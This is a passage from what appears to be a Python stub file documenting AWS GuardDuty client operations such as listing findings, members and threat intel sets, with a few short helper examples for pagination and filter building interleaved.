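    return response.get('Status') in USABLE_IPSET_STATUSES
```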
def get_master_account(DetectorId=None):
"""
Provides the details for the GuardDuty master account associated with the current GuardDuty member account.
See also: AWS API Documentation
Exceptions
:example: response = client.get_master_account(
DetectorId='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector of the GuardDuty member account.\n
:rtype: dict
Returns
Response Syntax
{
'Master': {
'AccountId': 'string',
'InvitationId': 'string',
'RelationshipStatus': 'string',
'InvitedAt': 'string'
}
}
Response Structure
(dict) --
Master (dict) --The master account details.
AccountId (string) --The ID of the account used as the master account.
InvitationId (string) --The value used to validate the master account to the member account.
RelationshipStatus (string) --The status of the relationship between the master and member accounts.
InvitedAt (string) --The timestamp when the invitation was sent.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'Master': {
'AccountId': 'string',
'InvitationId': 'string',
'RelationshipStatus': 'string',
'InvitedAt': 'string'
}
}
"""
pass
def get_members(DetectorId=None, AccountIds=None):
"""
Retrieves GuardDuty member accounts (to the current GuardDuty master account) specified by the account IDs.
See also: AWS API Documentation
Exceptions
:example: response = client.get_members(
DetectorId='string',
AccountIds=[
'string',
]
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector of the GuardDuty account whose members you want to retrieve.\n
:type AccountIds: list
:param AccountIds: [REQUIRED]\nA list of account IDs of the GuardDuty member accounts that you want to describe.\n\n(string) --\n\n
:rtype: dict
Returns
Response Syntax
{
'Members': [
{
'AccountId': 'string',
'DetectorId': 'string',
'MasterId': 'string',
'Email': 'string',
'RelationshipStatus': 'string',
'InvitedAt': 'string',
'UpdatedAt': 'string'
},
],
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
Response Structure
(dict) --
Members (list) --
A list of members.
(dict) --
Contains information about the member account.
AccountId (string) --
The ID of the member account.
DetectorId (string) --
The detector ID of the member account.
MasterId (string) --
The master account ID.
Email (string) --
The email address of the member account.
RelationshipStatus (string) --
The status of the relationship between the member and the master.
InvitedAt (string) --
The timestamp when the invitation was sent.
UpdatedAt (string) --
The last-updated timestamp of the member.
UnprocessedAccounts (list) --
A list of objects that contain the unprocessed account and a result string that explains why it was unprocessed.
(dict) --
Contains information about the accounts that weren\'t processed.
AccountId (string) --
The AWS account ID.
Result (string) --
A reason why the account hasn\'t been processed.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'Members': [
{
'AccountId': 'string',
'DetectorId': 'string',
'MasterId': 'string',
'Email': 'string',
'RelationshipStatus': 'string',
'InvitedAt': 'string',
'UpdatedAt': 'string'
},
],
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
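Because the response splits results into `Members` and `UnprocessedAccounts`, callers usually want a quick per-account view. An illustrative helper (hypothetical name, not part of the client) that maps each returned member to its `RelationshipStatus`:

```python
def relationship_statuses(response):
    """Map AccountId -> RelationshipStatus from a get_members()-shaped
    response dict. Unprocessed accounts are simply absent from the map."""
    return {
        member['AccountId']: member['RelationshipStatus']
        for member in response.get('Members', [])
    }
```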
def get_paginator(operation_name=None):
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name\nas the method name on the client. For example, if the\nmethod name is create_foo, and you\'d normally invoke the\noperation as client.create_foo(**kwargs), if the\ncreate_foo operation can be paginated, you can use the\ncall client.get_paginator('create_foo').
:rtype: L{botocore.paginate.Paginator}
Returns
A paginator object.
"""
pass
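The paginator pattern is the same for every paginated operation: call `paginate()` and iterate pages, each page being one API response. The sketch below uses a stand-in object so the loop shape is clear without a live client; with a real client you would write `paginator = client.get_paginator('list_detectors')` instead.

```python
class FakePaginator:
    """Stand-in (for illustration only) that yields pages the way
    botocore's Paginator.paginate() does."""
    def __init__(self, pages):
        self._pages = pages

    def paginate(self):
        yield from self._pages

# Hypothetical pages shaped like list_detectors() responses.
paginator = FakePaginator([
    {'DetectorIds': ['d1', 'd2']},
    {'DetectorIds': ['d3']},
])

detector_ids = []
for page in paginator.paginate():   # each page is one API response
    detector_ids.extend(page['DetectorIds'])
```

The paginator handles `NextToken` bookkeeping internally, which is why the loop body never touches tokens.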
def get_threat_intel_set(DetectorId=None, ThreatIntelSetId=None):
"""
Retrieves the ThreatIntelSet that is specified by the ThreatIntelSet ID.
See also: AWS API Documentation
Exceptions
:example: response = client.get_threat_intel_set(
DetectorId='string',
ThreatIntelSetId='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector that the threatIntelSet is associated with.\n
:type ThreatIntelSetId: string
:param ThreatIntelSetId: [REQUIRED]\nThe unique ID of the threatIntelSet that you want to get.\n
:rtype: dict
Returns
Response Syntax
{
'Name': 'string',
'Format': 'TXT'|'STIX'|'OTX_CSV'|'ALIEN_VAULT'|'PROOF_POINT'|'FIRE_EYE',
'Location': 'string',
'Status': 'INACTIVE'|'ACTIVATING'|'ACTIVE'|'DEACTIVATING'|'ERROR'|'DELETE_PENDING'|'DELETED',
'Tags': {
'string': 'string'
}
}
Response Structure
(dict) --
Name (string) --
A user-friendly ThreatIntelSet name displayed in all findings that are generated by activity that involves IP addresses included in this ThreatIntelSet.
Format (string) --
The format of the threatIntelSet.
Location (string) --
The URI of the file that contains the ThreatIntelSet.
Status (string) --
The status of the threatIntelSet file that was uploaded.
Tags (dict) --
The tags of the threat list resource.
(string) --
(string) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'Name': 'string',
'Format': 'TXT'|'STIX'|'OTX_CSV'|'ALIEN_VAULT'|'PROOF_POINT'|'FIRE_EYE',
'Location': 'string',
'Status': 'INACTIVE'|'ACTIVATING'|'ACTIVE'|'DEACTIVATING'|'ERROR'|'DELETE_PENDING'|'DELETED',
'Tags': {
'string': 'string'
}
}
:returns:
(string) --
(string) --
"""
pass
def get_waiter(waiter_name=None):
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters\nsection of the service docs for a list of available waiters.
:rtype: botocore.waiter.Waiter
"""
pass
def invite_members(DetectorId=None, AccountIds=None, DisableEmailNotification=None, Message=None):
"""
Invites other AWS accounts (created as members of the current AWS account by CreateMembers) to enable GuardDuty, and allow the current AWS account to view and manage these accounts\' GuardDuty findings on their behalf as the master account.
See also: AWS API Documentation
Exceptions
:example: response = client.invite_members(
DetectorId='string',
AccountIds=[
'string',
],
DisableEmailNotification=True|False,
Message='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector of the GuardDuty account that you want to invite members with.\n
:type AccountIds: list
:param AccountIds: [REQUIRED]\nA list of account IDs of the accounts that you want to invite to GuardDuty as members.\n\n(string) --\n\n
:type DisableEmailNotification: boolean
:param DisableEmailNotification: A Boolean value that specifies whether you want to disable email notification to the accounts that you\xe2\x80\x99re inviting to GuardDuty as members.
:type Message: string
:param Message: The invitation message that you want to send to the accounts that you\xe2\x80\x99re inviting to GuardDuty as members.
:rtype: dict
Returns
Response Syntax
{
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
Response Structure
(dict) --
UnprocessedAccounts (list) --
A list of objects that contain the unprocessed account and a result string that explains why it was unprocessed.
(dict) --
Contains information about the accounts that weren\'t processed.
AccountId (string) --
The AWS account ID.
Result (string) --
A reason why the account hasn\'t been processed.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
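A successful call can still leave some invitations unsent, reported via `UnprocessedAccounts`. An illustrative helper (hypothetical name) that turns that list into an AccountId-to-reason map, suitable for logging or a retry queue:

```python
def unprocessed_reasons(response):
    """Map AccountId -> Result (the failure reason string) from an
    invite_members()-shaped response dict."""
    return {
        entry['AccountId']: entry['Result']
        for entry in response.get('UnprocessedAccounts', [])
    }
```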
def list_detectors(MaxResults=None, NextToken=None):
"""
Lists detectorIds of all the existing Amazon GuardDuty detector resources.
See also: AWS API Documentation
Exceptions
:example: response = client.list_detectors(
MaxResults=123,
NextToken='string'
)
:type MaxResults: integer
:param MaxResults: You can use this parameter to indicate the maximum number of items that you want in the response. The default value is 50. The maximum value is 50.
:type NextToken: string
:param NextToken: You can use this parameter when paginating results. Set the value of this parameter to null on your first call to the list action. For subsequent calls to the action, fill nextToken in the request with the value of NextToken from the previous response to continue listing data.
:rtype: dict
Returns
Response Syntax
{
'DetectorIds': [
'string',
],
'NextToken': 'string'
}
Response Structure
(dict) --
DetectorIds (list) --
A list of detector IDs.
(string) --
NextToken (string) --
The pagination parameter to be used on the next list operation to retrieve more items.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'DetectorIds': [
'string',
],
'NextToken': 'string'
}
:returns:
(string) --
"""
pass
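The `NextToken` parameter described above can also be driven by hand when a paginator is not available. The loop below sketches that pattern against a stubbed function that mimics `list_detectors()` responses; the stub and its page contents are hypothetical.

```python
def fake_list_detectors(NextToken=''):
    """Stub that returns canned list_detectors()-shaped pages."""
    pages = {
        '': {'DetectorIds': ['d1'], 'NextToken': 't1'},
        't1': {'DetectorIds': ['d2']},   # last page: no NextToken key
    }
    return pages[NextToken]

detectors, token = [], ''
while True:
    page = fake_list_detectors(NextToken=token)
    detectors.extend(page['DetectorIds'])
    token = page.get('NextToken')       # absent on the final page
    if not token:
        break
```

The termination condition mirrors the documented behavior: the final page omits `NextToken`, so `page.get('NextToken')` returns `None` and the loop exits.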
def list_filters(DetectorId=None, MaxResults=None, NextToken=None):
"""
Returns a paginated list of the current filters.
See also: AWS API Documentation
Exceptions
:example: response = client.list_filters(
DetectorId='string',
MaxResults=123,
NextToken='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector that the filter is associated with.\n
:type MaxResults: integer
:param MaxResults: You can use this parameter to indicate the maximum number of items that you want in the response. The default value is 50. The maximum value is 50.
:type NextToken: string
:param NextToken: You can use this parameter when paginating results. Set the value of this parameter to null on your first call to the list action. For subsequent calls to the action, fill nextToken in the request with the value of NextToken from the previous response to continue listing data.
:rtype: dict
Returns
Response Syntax
{
'FilterNames': [
'string',
],
'NextToken': 'string'
}
Response Structure
(dict) --
FilterNames (list) --
A list of filter names.
(string) --
NextToken (string) --
The pagination parameter to be used on the next list operation to retrieve more items.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'FilterNames': [
'string',
],
'NextToken': 'string'
}
:returns:
(string) --
"""
pass
def list_findings(DetectorId=None, FindingCriteria=None, SortCriteria=None, MaxResults=None, NextToken=None):
"""
Lists Amazon GuardDuty findings for the specified detector ID.
See also: AWS API Documentation
Exceptions
:example: response = client.list_findings(
DetectorId='string',
FindingCriteria={
'Criterion': {
'string': {
'Eq': [
'string',
],
'Neq': [
'string',
],
'Gt': 123,
'Gte': 123,
'Lt': 123,
'Lte': 123,
'Equals': [
'string',
],
'NotEquals': [
'string',
],
'GreaterThan': 123,
'GreaterThanOrEqual': 123,
'LessThan': 123,
'LessThanOrEqual': 123
}
}
},
SortCriteria={
'AttributeName': 'string',
'OrderBy': 'ASC'|'DESC'
},
MaxResults=123,
NextToken='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe ID of the detector that specifies the GuardDuty service whose findings you want to list.\n
:type FindingCriteria: dict
:param FindingCriteria: Represents the criteria used for querying findings. Valid values include:\n\nJSON field name\naccountId\nregion\nconfidence\nid\nresource.accessKeyDetails.accessKeyId\nresource.accessKeyDetails.principalId\nresource.accessKeyDetails.userName\nresource.accessKeyDetails.userType\nresource.instanceDetails.iamInstanceProfile.id\nresource.instanceDetails.imageId\nresource.instanceDetails.instanceId\nresource.instanceDetails.outpostArn\nresource.instanceDetails.networkInterfaces.ipv6Addresses\nresource.instanceDetails.networkInterfaces.privateIpAddresses.privateIpAddress\nresource.instanceDetails.networkInterfaces.publicDnsName\nresource.instanceDetails.networkInterfaces.publicIp\nresource.instanceDetails.networkInterfaces.securityGroups.groupId\nresource.instanceDetails.networkInterfaces.securityGroups.groupName\nresource.instanceDetails.networkInterfaces.subnetId\nresource.instanceDetails.networkInterfaces.vpcId\nresource.instanceDetails.tags.key\nresource.instanceDetails.tags.value\nresource.resourceType\nservice.action.actionType\nservice.action.awsApiCallAction.api\nservice.action.awsApiCallAction.callerType\nservice.action.awsApiCallAction.remoteIpDetails.city.cityName\nservice.action.awsApiCallAction.remoteIpDetails.country.countryName\nservice.action.awsApiCallAction.remoteIpDetails.ipAddressV4\nservice.action.awsApiCallAction.remoteIpDetails.organization.asn\nservice.action.awsApiCallAction.remoteIpDetails.organization.asnOrg\nservice.action.awsApiCallAction.serviceName\nservice.action.dnsRequestAction.domain\nservice.action.networkConnectionAction.blocked\nservice.action.networkConnectionAction.connectionDirection\nservice.action.networkConnectionAction.localPortDetails.port\nservice.action.networkConnectionAction.protocol\nservice.action.networkConnectionAction.localIpDetails.ipAddressV4\nservice.action.networkConnectionAction.remoteIpDetails.city.cityName\nservice.action.networkConnectionAction.remoteIpDetails.country.countryName\nservice.action.networkConnectionAction.remoteIpDetails.ipAddressV4\nservice.action.networkConnectionAction.remoteIpDetails.organization.asn\nservice.action.networkConnectionAction.remoteIpDetails.organization.asnOrg\nservice.action.networkConnectionAction.remotePortDetails.port\nservice.additionalInfo.threatListName\nservice.archived When this attribute is set to \'true\', only archived findings are listed. When it\'s set to \'false\', only unarchived findings are listed. When this attribute is not set, all existing findings are listed.\nservice.resourceRole\nseverity\ntype\nupdatedAt Type: Timestamp in Unix Epoch millisecond format: 1486685375000\n\n\nCriterion (dict) --Represents a map of finding properties that match specified conditions and values when querying findings.\n\n(string) --\n(dict) --Contains information about the condition.\n\nEq (list) --Represents the equal condition to be applied to a single field when querying for findings.\n\n(string) --\n\n\nNeq (list) --Represents the not equal condition to be applied to a single field when querying for findings.\n\n(string) --\n\n\nGt (integer) --Represents a greater than condition to be applied to a single field when querying for findings.\n\nGte (integer) --Represents a greater than or equal condition to be applied to a single field when querying for findings.\n\nLt (integer) --Represents a less than condition to be applied to a single field when querying for findings.\n\nLte (integer) --Represents a less than or equal condition to be applied to a single field when querying for findings.\n\nEquals (list) --Represents an equal condition to be applied to a single field when querying for findings.\n\n(string) --\n\n\nNotEquals (list) --Represents a not equal condition to be applied to a single field when querying for findings.\n\n(string) --\n\n\nGreaterThan (integer) --Represents a greater than condition to be applied to a single field when querying for findings.\n\nGreaterThanOrEqual (integer) --Represents a greater than or equal condition to be applied to a single field when querying for findings.\n\nLessThan (integer) --Represents a less than condition to be applied to a single field when querying for findings.\n\nLessThanOrEqual (integer) --Represents a less than or equal condition to be applied to a single field when querying for findings.\n\n\n\n\n\n\n\n\n
:type SortCriteria: dict
:param SortCriteria: Represents the criteria used for sorting findings.\n\nAttributeName (string) --Represents the finding attribute (for example, accountId) to sort findings by.\n\nOrderBy (string) --The order by which the sorted findings are to be displayed.\n\n\n
:type MaxResults: integer
:param MaxResults: You can use this parameter to indicate the maximum number of items you want in the response. The default value is 50. The maximum value is 50.
:type NextToken: string
:param NextToken: You can use this parameter when paginating results. Set the value of this parameter to null on your first call to the list action. For subsequent calls to the action, fill nextToken in the request with the value of NextToken from the previous response to continue listing data.
:rtype: dict
Returns
Response Syntax
{
'FindingIds': [
'string',
],
'NextToken': 'string'
}
Response Structure
(dict) --
FindingIds (list) --
The IDs of the findings that you\'re listing.
(string) --
NextToken (string) --
The pagination parameter to be used on the next list operation to retrieve more items.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'FindingIds': [
'string',
],
'NextToken': 'string'
}
:returns:
(string) --
"""
pass
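The Criterion map shown above can be assembled programmatically. A short sketch (illustrative helper, not part of the GuardDuty API) that builds FindingCriteria selecting unarchived findings at or above a severity threshold, using field names from the list above:

```python
def build_finding_criteria(min_severity):
    """Build a FindingCriteria dict for list_findings (illustrative only)."""
    return {
        'Criterion': {
            # severity supports the numeric comparison conditions
            'severity': {'GreaterThanOrEqual': min_severity},
            # service.archived is matched as the string 'true'/'false'
            'service.archived': {'Eq': ['false']},
        }
    }
```

The result can be passed directly as the FindingCriteria argument, e.g. `client.list_findings(DetectorId=detector_id, FindingCriteria=build_finding_criteria(7))`.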
def list_invitations(MaxResults=None, NextToken=None):
"""
Lists all GuardDuty membership invitations that were sent to the current AWS account.
See also: AWS API Documentation
Exceptions
:example: response = client.list_invitations(
MaxResults=123,
NextToken='string'
)
:type MaxResults: integer
:param MaxResults: You can use this parameter to indicate the maximum number of items that you want in the response. The default value is 50. The maximum value is 50.
:type NextToken: string
:param NextToken: You can use this parameter when paginating results. Set the value of this parameter to null on your first call to the list action. For subsequent calls to the action, fill nextToken in the request with the value of NextToken from the previous response to continue listing data.
:rtype: dict
ReturnsResponse Syntax
{
'Invitations': [
{
'AccountId': 'string',
'InvitationId': 'string',
'RelationshipStatus': 'string',
'InvitedAt': 'string'
},
],
'NextToken': 'string'
}
Response Structure
(dict) --
Invitations (list) --
A list of invitation descriptions.
(dict) --
Contains information about the invitation to become a member account.
AccountId (string) --
The ID of the account that the invitation was sent from.
InvitationId (string) --
The ID of the invitation. This value is used to validate the inviter account to the member account.
RelationshipStatus (string) --
The status of the relationship between the inviter and invitee accounts.
InvitedAt (string) --
The timestamp when the invitation was sent.
NextToken (string) --
The pagination parameter to be used on the next list operation to retrieve more items.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'Invitations': [
{
'AccountId': 'string',
'InvitationId': 'string',
'RelationshipStatus': 'string',
'InvitedAt': 'string'
},
],
'NextToken': 'string'
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def list_ip_sets(DetectorId=None, MaxResults=None, NextToken=None):
"""
Lists the IPSets of the GuardDuty service specified by the detector ID. If you use this operation from a member account, the IPSets returned are the IPSets from the associated master account.
See also: AWS API Documentation
Exceptions
:example: response = client.list_ip_sets(
DetectorId='string',
MaxResults=123,
NextToken='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector that the IPSet is associated with.\n
:type MaxResults: integer
:param MaxResults: You can use this parameter to indicate the maximum number of items you want in the response. The default value is 50. The maximum value is 50.
:type NextToken: string
:param NextToken: You can use this parameter when paginating results. Set the value of this parameter to null on your first call to the list action. For subsequent calls to the action, fill nextToken in the request with the value of NextToken from the previous response to continue listing data.
:rtype: dict
ReturnsResponse Syntax
{
'IpSetIds': [
'string',
],
'NextToken': 'string'
}
Response Structure
(dict) --
IpSetIds (list) --
The IDs of the IPSet resources.
(string) --
NextToken (string) --
The pagination parameter to be used on the next list operation to retrieve more items.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'IpSetIds': [
'string',
],
'NextToken': 'string'
}
:returns:
(string) --
"""
pass
def list_members(DetectorId=None, MaxResults=None, NextToken=None, OnlyAssociated=None):
"""
Lists details about associated member accounts for the current GuardDuty master account.
See also: AWS API Documentation
Exceptions
:example: response = client.list_members(
DetectorId='string',
MaxResults=123,
NextToken='string',
OnlyAssociated='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector the member is associated with.\n
:type MaxResults: integer
:param MaxResults: You can use this parameter to indicate the maximum number of items you want in the response. The default value is 50. The maximum value is 50.
:type NextToken: string
:param NextToken: You can use this parameter when paginating results. Set the value of this parameter to null on your first call to the list action. For subsequent calls to the action, fill nextToken in the request with the value of NextToken from the previous response to continue listing data.
:type OnlyAssociated: string
:param OnlyAssociated: Specifies which member accounts the response includes, based on their relationship status with the master account. The default value is 'true'. If set to 'false', the response includes all existing member accounts (including members who haven\'t been invited yet or have been disassociated).
:rtype: dict
Returns
Response Syntax
{
'Members': [
{
'AccountId': 'string',
'DetectorId': 'string',
'MasterId': 'string',
'Email': 'string',
'RelationshipStatus': 'string',
'InvitedAt': 'string',
'UpdatedAt': 'string'
},
],
'NextToken': 'string'
}
Response Structure
(dict) --
Members (list) --
A list of members.
(dict) --
Contains information about the member account.
AccountId (string) --
The ID of the member account.
DetectorId (string) --
The detector ID of the member account.
MasterId (string) --
The master account ID.
Email (string) --
The email address of the member account.
RelationshipStatus (string) --
The status of the relationship between the member and the master.
InvitedAt (string) --
The timestamp when the invitation was sent.
UpdatedAt (string) --
The last-updated timestamp of the member.
NextToken (string) --
The pagination parameter to be used on the next list operation to retrieve more items.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'Members': [
{
'AccountId': 'string',
'DetectorId': 'string',
'MasterId': 'string',
'Email': 'string',
'RelationshipStatus': 'string',
'InvitedAt': 'string',
'UpdatedAt': 'string'
},
],
'NextToken': 'string'
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def list_organization_admin_accounts(MaxResults=None, NextToken=None):
"""
Lists the accounts configured as GuardDuty delegated administrators.
See also: AWS API Documentation
Exceptions
:example: response = client.list_organization_admin_accounts(
MaxResults=123,
NextToken='string'
)
:type MaxResults: integer
:param MaxResults: The maximum number of results to return in the response.
:type NextToken: string
:param NextToken: A token to use for paginating results that are returned in the response. Set the value of this parameter to null for the first request to a list action. For subsequent calls, use the NextToken value returned from the previous request to continue listing results after the first page.
:rtype: dict
ReturnsResponse Syntax
{
'AdminAccounts': [
{
'AdminAccountId': 'string',
'AdminStatus': 'ENABLED'|'DISABLE_IN_PROGRESS'
},
],
'NextToken': 'string'
}
Response Structure
(dict) --
AdminAccounts (list) --
An AdminAccounts object that includes a list of accounts configured as GuardDuty delegated administrators.
(dict) --
The account within the organization specified as the GuardDuty delegated administrator.
AdminAccountId (string) --
The AWS account ID for the account.
AdminStatus (string) --
Indicates whether the account is enabled as the delegated administrator.
NextToken (string) --
The pagination parameter to be used on the next list operation to retrieve more items.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'AdminAccounts': [
{
'AdminAccountId': 'string',
'AdminStatus': 'ENABLED'|'DISABLE_IN_PROGRESS'
},
],
'NextToken': 'string'
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def list_publishing_destinations(DetectorId=None, MaxResults=None, NextToken=None):
"""
Returns a list of publishing destinations associated with the specified detectorId .
See also: AWS API Documentation
Exceptions
:example: response = client.list_publishing_destinations(
DetectorId='string',
MaxResults=123,
NextToken='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe ID of the detector to retrieve publishing destinations for.\n
:type MaxResults: integer
:param MaxResults: The maximum number of results to return in the response.
:type NextToken: string
:param NextToken: A token to use for paginating results that are returned in the response. Set the value of this parameter to null for the first request to a list action. For subsequent calls, use the NextToken value returned from the previous request to continue listing results after the first page.
:rtype: dict
ReturnsResponse Syntax
{
'Destinations': [
{
'DestinationId': 'string',
'DestinationType': 'S3',
'Status': 'PENDING_VERIFICATION'|'PUBLISHING'|'UNABLE_TO_PUBLISH_FIX_DESTINATION_PROPERTY'|'STOPPED'
},
],
'NextToken': 'string'
}
Response Structure
(dict) --
Destinations (list) --
A Destinations object that includes information about each publishing destination returned.
(dict) --
Contains information about the publishing destination, including the ID, type, and status.
DestinationId (string) --
The unique ID of the publishing destination.
DestinationType (string) --
The type of resource used for the publishing destination. Currently, only Amazon S3 buckets are supported.
Status (string) --
The status of the publishing destination.
NextToken (string) --
A token to use for paginating results that are returned in the response. Set the value of this parameter to null for the first request to a list action. For subsequent calls, use the NextToken value returned from the previous request to continue listing results after the first page.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'Destinations': [
{
'DestinationId': 'string',
'DestinationType': 'S3',
'Status': 'PENDING_VERIFICATION'|'PUBLISHING'|'UNABLE_TO_PUBLISH_FIX_DESTINATION_PROPERTY'|'STOPPED'
},
],
'NextToken': 'string'
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def list_tags_for_resource(ResourceArn=None):
"""
Lists tags for a resource. Tagging is currently supported for detectors, finding filters, IP sets, and threat intel sets, with a limit of 50 tags per resource. When invoked, this operation returns all assigned tags for a given resource.
See also: AWS API Documentation
Exceptions
:example: response = client.list_tags_for_resource(
ResourceArn='string'
)
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) for the given GuardDuty resource.\n
:rtype: dict
Returns
Response Syntax
{
'Tags': {
'string': 'string'
}
}
Response Structure
(dict) --
Tags (dict) --
The tags associated with the resource.
(string) --
(string) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'Tags': {
'string': 'string'
}
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def list_threat_intel_sets(DetectorId=None, MaxResults=None, NextToken=None):
"""
Lists the ThreatIntelSets of the GuardDuty service specified by the detector ID. If you use this operation from a member account, the ThreatIntelSets associated with the master account are returned.
See also: AWS API Documentation
Exceptions
:example: response = client.list_threat_intel_sets(
DetectorId='string',
MaxResults=123,
NextToken='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector that the threatIntelSet is associated with.\n
:type MaxResults: integer
:param MaxResults: You can use this parameter to indicate the maximum number of items that you want in the response. The default value is 50. The maximum value is 50.
:type NextToken: string
:param NextToken: You can use this parameter to paginate results in the response. Set the value of this parameter to null on your first call to the list action. For subsequent calls to the action, fill nextToken in the request with the value of NextToken from the previous response to continue listing data.
:rtype: dict
Returns
Response Syntax
{
'ThreatIntelSetIds': [
'string',
],
'NextToken': 'string'
}
Response Structure
(dict) --
ThreatIntelSetIds (list) --
The IDs of the ThreatIntelSet resources.
(string) --
NextToken (string) --
The pagination parameter to be used on the next list operation to retrieve more items.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'ThreatIntelSetIds': [
'string',
],
'NextToken': 'string'
}
:returns:
(string) --
"""
pass
def start_monitoring_members(DetectorId=None, AccountIds=None):
"""
Turns on GuardDuty monitoring of the specified member accounts. Use this operation to restart monitoring of accounts that you stopped monitoring with the StopMonitoringMembers operation.
See also: AWS API Documentation
Exceptions
:example: response = client.start_monitoring_members(
DetectorId='string',
AccountIds=[
'string',
]
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector of the GuardDuty master account associated with the member accounts to monitor.\n
:type AccountIds: list
:param AccountIds: [REQUIRED]\nA list of account IDs of the GuardDuty member accounts to start monitoring.\n\n(string) --\n\n
:rtype: dict
Returns
Response Syntax
{
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
Response Structure
(dict) --
UnprocessedAccounts (list) --
A list of objects that contain the unprocessed account and a result string that explains why it was unprocessed.
(dict) --
Contains information about the accounts that weren\'t processed.
AccountId (string) --
The AWS account ID.
Result (string) --
A reason why the account hasn\'t been processed.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def stop_monitoring_members(DetectorId=None, AccountIds=None):
"""
Stops GuardDuty monitoring for the specified member accounts. Use the StartMonitoringMembers operation to restart monitoring for those accounts.
See also: AWS API Documentation
Exceptions
:example: response = client.stop_monitoring_members(
DetectorId='string',
AccountIds=[
'string',
]
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector associated with the GuardDuty master account that is monitoring member accounts.\n
:type AccountIds: list
:param AccountIds: [REQUIRED]\nA list of account IDs for the member accounts to stop monitoring.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
Response Structure
(dict) --
UnprocessedAccounts (list) --
A list of objects that contain an accountId for each account that could not be processed, and a result string that indicates why the account was not processed.
(dict) --
Contains information about the accounts that weren\'t processed.
AccountId (string) --
The AWS account ID.
Result (string) --
A reason why the account hasn\'t been processed.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def tag_resource(ResourceArn=None, Tags=None):
"""
Adds tags to a resource.
See also: AWS API Documentation
Exceptions
:example: response = client.tag_resource(
ResourceArn='string',
Tags={
'string': 'string'
}
)
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) for the GuardDuty resource to apply a tag to.\n
:type Tags: dict
:param Tags: [REQUIRED]\nThe tags to be added to a resource.\n\n(string) --\n(string) --\n\n\n\n
:rtype: dict
Returns
Response Syntax
{}
